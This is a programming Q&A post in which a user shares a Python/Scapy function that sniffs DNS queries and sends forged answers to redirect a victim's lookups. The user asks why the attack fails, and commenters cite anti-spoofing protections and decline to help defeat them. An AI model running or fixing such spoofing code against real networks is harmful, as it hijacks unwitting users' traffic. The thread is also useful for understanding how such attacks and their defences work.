# DNS Spoofing - spoofed packet doesn't work

Tags: python, dns, wifi, scapy, spoofing

I'm trying to perform **DNS spoofing** but seems it doesn't impact the victim,
The packet is showing on Wireshark the way it needs to be but still, **the victim gets to the correct IP and not the one I wants to** (facebook.com)

```
def dns_spoof(pkt):
    redirect_to = '157.240.195.35' # facebook.com IP

    spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst)/\
                    UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport)/\
                    DNS(id=pkt[DNS].id, qd=pkt[DNS].qd, aa = 1, qr=1, \
                    an=DNSRR(rrname=pkt[DNS].qd.qname,  ttl=10, rdata=redirect_to))
    send(spoofed_pkt)
```

```
pk = sniff(lfilter=filtering, prn=dns_spoof)# main
```

picture from Wireshark: (trying to spoof when victim enter cool.com)
[image]

Why doesn't it work?

Comment: There are anti-spoofing protections in modern DNS clients.

Comment: so theoretically the code should work but because of the protections, it doesn't?
How can I make it work?

Comment: You can't, that's the whole point of anti-spoofing protections.

Comment: transaction id of response should match transaction id of request for victim to accept "fake" response

Comment: @MaximSagaydachny which is already the case here: "id=pkt[DNS].id". Which is one anti-spoofing method but certainly not the only one. The question is anyway offtopic here as not related to programming (and missing important details anyway, like the network setup, who and where the victim is, which applications - browsers do use DNS over HTTPS nowadays, etc.).